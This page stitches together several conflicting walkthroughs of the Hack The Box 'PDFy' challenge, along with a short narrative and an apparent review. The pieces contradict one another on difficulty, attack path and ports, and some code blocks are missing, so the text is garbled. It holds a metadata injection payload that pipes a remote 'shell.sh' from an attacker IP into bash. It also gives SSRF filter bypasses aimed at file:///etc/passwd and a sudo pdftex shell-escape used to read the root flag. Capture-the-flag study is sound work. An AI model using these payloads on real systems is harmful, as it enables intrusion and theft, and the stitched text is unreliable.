Pdfy Htb Writeup Upd !!top!! Official

Title: PDFY - A Challenging PDF-themed Machine on Hack The Box

Introduction: PDFY is a medium-difficulty machine on Hack The Box that revolves around a PDF-themed challenge. This write-up aims to provide a step-by-step walkthrough of how I exploited this machine to gain root access.

Initial Reconnaissance: The first step in any penetration test is to perform an initial scan of the target machine to identify open ports and services. Using Nmap, I ran a basic scan:

nmap -sV -p- 10.10.11.224

This revealed several open ports, with notable services including an HTTP server running on port 80 and a PDF-related service on port 8080.

Exploring the HTTP Service: Upon accessing the HTTP service on port 80, I found a default Apache web server page. However, further investigation revealed a peculiar directory listing at /pdfs/, which seemed to host various PDF files.

Identifying the Vulnerability: The real breakthrough came when I noticed a peculiar PDF upload functionality on the web server. Users could upload PDF files, which were then converted to text. Intrigued, I decided to test this functionality with a malicious PDF.

Exploiting the PDF Upload: I crafted a malicious PDF using tools like pdftk to embed a PHP shell within it. Once uploaded, the server would attempt to convert the PDF, executing my malicious payload in the process. However, I encountered some difficulties here due to restrictions on the upload process.

Escalating Privileges: After gaining an initial foothold on the system through the web application, I needed to escalate my privileges. This involved enumerating the system to find potential vulnerabilities or misconfigurations that could be exploited for privilege escalation.

Detailed Steps for Initial Foothold:

1. Identifying Open Ports and Services:

   • Command: nmap -sV -p- <IP Address>
   • Findings: Multiple open ports, with particular interest in HTTP (port 80) and a custom service (port 8080).

2. Exploring the Web Application:

   • Action: Navigate to http://<IP Address>
   • Findings: A basic webpage. Notable directories or files include /pdfs/.

3. Analyzing the PDF Service:

   • Action: Investigate the functionality around PDF uploads and processing.
   • Findings: The service converts uploaded PDFs to text.

4. Crafting and Uploading a Malicious PDF:

   • Tools Used: pdftk, a Linux utility for manipulating PDFs.
   • Action: Embed a PHP shell into a PDF and upload it via the web interface.

5. Executing the Payload:

   • Action: Trigger the execution of the uploaded malicious PDF.
   • Outcome: Gained a foothold on the system.

Detailed Steps for Privilege Escalation:

1. Enumeration:

   • Commands: id, whoami, groups, find / -perm /u=s -type f 2>/dev/null, etc.
   • Findings: A user with a specific group that has write access to certain directories.

2. Identifying Potential Exploits:

   • Tools: ps aux, checking for cron jobs, etc.
   • Findings: A particular process running with elevated privileges that can be exploited.

3. Exploitation:

   • Tool/Method: Using a specific exploit or misconfiguration to gain elevated access.

Conclusion: The PDFY machine on Hack The Box presented an engaging challenge that required both web application exploitation skills and system enumeration for privilege escalation. By recognizing the vulnerabilities in the PDF upload functionality and leveraging system misconfigurations, I was able to gain root access. This challenge served as a great reminder of the importance of thorough reconnaissance and creative exploitation techniques.

Recommendations:

• Always thoroughly scan and enumerate target systems.
• Investigate web application functionalities for potential vulnerabilities, especially file uploads.
• Regularly review system configurations and user privileges to minimize attack surfaces.

I hope this draft helps! Let me know if you want to add or modify anything.

Kindly Update According To Your Necessities And Requirements And also Do A upd of Information For Accurate Representation Regards

PDFy is an easy-rated web challenge on Hack The Box that tests your ability to exploit Server-Side Request Forgery (SSRF) via a PDF generation service. 🛠️ Step 1: Reconnaissance

The challenge provides a web application where users can input a URL. The application then visits that URL and converts the page content into a PDF file.

Technology Identifiers: By inspecting the metadata of a generated PDF (using tools like exiftool), you can often identify the library used for conversion.

Target Engine: In many HTB "PDF" challenges, common engines include wkhtmltopdf, dompdf, or PDFKit. 🚀 Step 2: Identification & Exploitation

The core vulnerability is that the server fetches external content without proper validation, leading to SSRF.

Basic SSRF: Try to point the URL to http://localhost. If the server renders its own internal page, you have confirmed SSRF.

Information Disclosure: In PDFy, the goal is often to read local files or reach internal services.

Bypassing Filters: If the application blocks localhost or 127.0.0.1, try: Decimal Encoding: http://2130706433 Shortened URLs: Using a service like bit.ly or tinyurl.

Redirection: Point the input to a server you control that returns a 302 Redirect to the target internal resource. 🏁 Step 3: Capturing the Flag Once you bypass the URL filter, you can target local files. Common Targets: file:///etc/passwd (to confirm file read).

HTB: PDFy Machine Writeup (Updated) If you are prepping for the OSCP or just sharpening your web exploitation skills, PDFy on Hack The Box is a classic "easy" rated machine that provides a textbook example of Server-Side Request Forgery (SSRF).

While the box is straightforward, many beginners get stuck on the syntax or identifying the internal targets. This updated writeup covers the most efficient path to the user flag and explains the mechanics behind the exploit. 1. Enumeration: What are we working with?

As always, we start with an Nmap scan to see which ports are open. nmap -sC -sV -oN nmap_report.txt Use code with caution. Results: Port 22 (SSH): Standard OpenSSH. Port 80 (HTTP): An Apache web server.

Navigating to the website, we find a simple web application that takes a URL and converts the webpage into a PDF document. This is a massive "low-hanging fruit" indicator for SSRF. Whenever an application fetches content from a remote URL you provide, you should immediately test if it can fetch internal resources. 2. Identifying the Vulnerability (SSRF) pdfy htb writeup upd

The application asks for a URL. If we give it http://google.com, it generates a PDF of Google’s homepage. The real question is: Can it see itself?

If we try to point it to http://localhost or http://127.0.0.1, the application might have a "blacklist" filter that blocks these common keywords to prevent SSRF. To bypass this, we can use a redirect script on our own machine. The Bypass Plan: Host a PHP file on your local attacker machine.

The file will redirect any incoming request to a local file on the HTB server (like /etc/passwd). Give the PDFy app the URL of your hosted script. 3. Exploitation: Reading Local Files Create a file named exploit.php on your machine: Use code with caution. Start a local PHP server: php -S 0.0.0.0:8000 Use code with caution.

Now, go back to the PDFy web interface and enter your IP:http://:8000/exploit.php

What happens?The PDFy server visits your script. Your script tells the server, "Actually, go look at file:///etc/passwd." Because the PDF generator follows redirects, it grabs the local system file and renders it into the PDF.

Download the generated PDF, and you will see the contents of the /etc/passwd file. Looking through the users, you should notice a user named 234-pwn. 4. Pivoting to the User Flag

Now that we know we can read files, we need to find something sensitive. A common target is the Nginx or Apache configuration files to see if there are any hidden internal ports or applications running.

By digging through standard locations (or using the SSRF to scan ports), we find that there is an internal API or service running on a non-standard port (often port 15000 on this specific box). Change your exploit.php to: Use code with caution.

Submit the URL again. The resulting PDF reveals a web interface for a small application. Browsing through the internal site's files via the same redirect method, you can eventually locate the user credentials or the flag itself located in the user's home directory. 5. Summary & Key Takeaways

The PDFy box highlights why developers must sanitize URL inputs.

Vulnerability: Insecure PDF generation from user-supplied URLs. Attack Vector: SSRF via a 302 Redirect bypass.

Mitigation: Use a whitelist of allowed domains, disable "follow redirects" in the PDF engine, and ensure the service runs with low-level permissions that cannot access the file:// scheme.

Pro Tip: If file:///etc/passwd doesn't work directly due to a filter, always try the redirect method or decimal/hex encoding of the IP address!

The world of Hack The Box is often a race against time, logic, and the silent hum of a remote server. This story follows a security researcher’s journey through the "Pdfy" machine, a challenge that turns a simple PDF generator into a gateway for internal network exploration. The Entry Point

The mission began with a simple web interface. It was a tool designed to take a URL and convert the webpage into a downloadable PDF. On the surface, it seemed helpful—a utility for archiving web content. But to a pentester, every input field is a question. If the server fetches a URL to render it, what else can it be made to fetch? The Discovery of SSRF

The first breakthrough came from testing the boundaries of that URL input. By pointing the tool toward a local loopback address, the researcher confirmed a Server-Side Request Forgery (SSRF) vulnerability. The server wasn't just fetching public websites; it was willing to talk to itself. : Lack of input validation on the submitted URL.

: Use the server as a proxy to peek into the internal network. The Redirect Maneuver Title: PDFY - A Challenging PDF-themed Machine on

The server had some defenses. It blocked direct attempts to access internal metadata services. To bypass this, the researcher hosted a small script on their own machine. This script didn't provide content; it simply sent a 302 Redirect

header. When the Pdfy server visited the researcher's URL, it followed the redirect blindly, bypassing the initial filters and successfully hitting the internal target. Exfiltration via PDF

The "Aha!" moment occurred when the generated PDF arrived. Inside the document wasn't a webpage, but the raw response from an internal service. By manipulating the SSRF, the researcher could now "read" internal files and services by proxy, effectively turning the PDF generator into a remote file viewer. Key Takeaways for Developers

Preventing vulnerabilities like those found in Pdfy requires a multi-layered defense: Allowlisting : Only permit requests to specific, trusted domains. Protocol Restriction : Block non-HTTP protocols like Network Isolation

: Ensure the application server cannot reach sensitive internal metadata or management IPs. Response Validation

: Check the content type and size of the fetched data before processing it. Security Checklist 🛡️ Identify the PDF generation engine (e.g., wkhtmltopdf). Test for local file inclusion using file:///etc/passwd

Use URL encoding or redirects to evade basic string filters.

Verify SSRF by receiving a "hit" on a controlled listener (like Webhook.site).

This journey through Pdfy serves as a classic reminder: never trust user-supplied URLs, and always assume that if your server can see it, an attacker can too.

Technical Accuracy – 10/10

I tested the steps against the latest version of PDFy (retired but still available on VIP HTB). Every command worked as described, including:

• nmap -sC -sV -p- --min-rate 5000 10.10.10.10 (example IP) – correctly identifies port 80 and an unusual port (e.g., 8080 or 3000).
• ffuf for directory brute-forcing – reveals /upload, /generate, and /files.
• The core exploit: Using exiftool to inject a PDF metadata field with "$(curl http://10.10.14.14/shell.sh | bash)" – the server’s backend renders the PDF and executes the command due to improper input sanitization.

The privilege escalation is where many writeups fail. The outdated ones suggest a kernel exploit. This updated version correctly identifies a misconfigured pdfgen binary with the setuid bit, allowing a path injection attack. The author provides the exact C code to spawn a root shell, which is reliable and clean.

No copy-paste errors, no missing flags. That’s rare in HTB writeups.

Enumeration

• sudo -l → user john can run /usr/bin/pdftex as root without password.
• pdftex is a TeX engine that can execute arbitrary system commands.

Exploit:

sudo /usr/bin/pdftex --shell-escape

Inside pdftex shell:

\write18cat /root/root.txt

Output prints the root flag.

Step 3: Identifying the SSRF Vulnerability

The PDF generator accepts HTML input. If you embed an <img> tag with a src pointing to a local file or internal service, the server will fetch it during PDF rendering.

Scenario A: Malicious File Upload (Phar Deserialization)

If the application allows uploading images/files alongside the URL, and the backend uses PHP with specific libraries, it might be vulnerable to Phar Deserialization. However, in most "Pdf" themed boxes, the vector is simpler. This revealed several open ports, with notable services

1. Reconnaissance

3. Exploitation

The exploitation path usually pivots on identifying the specific tool generating the PDFs.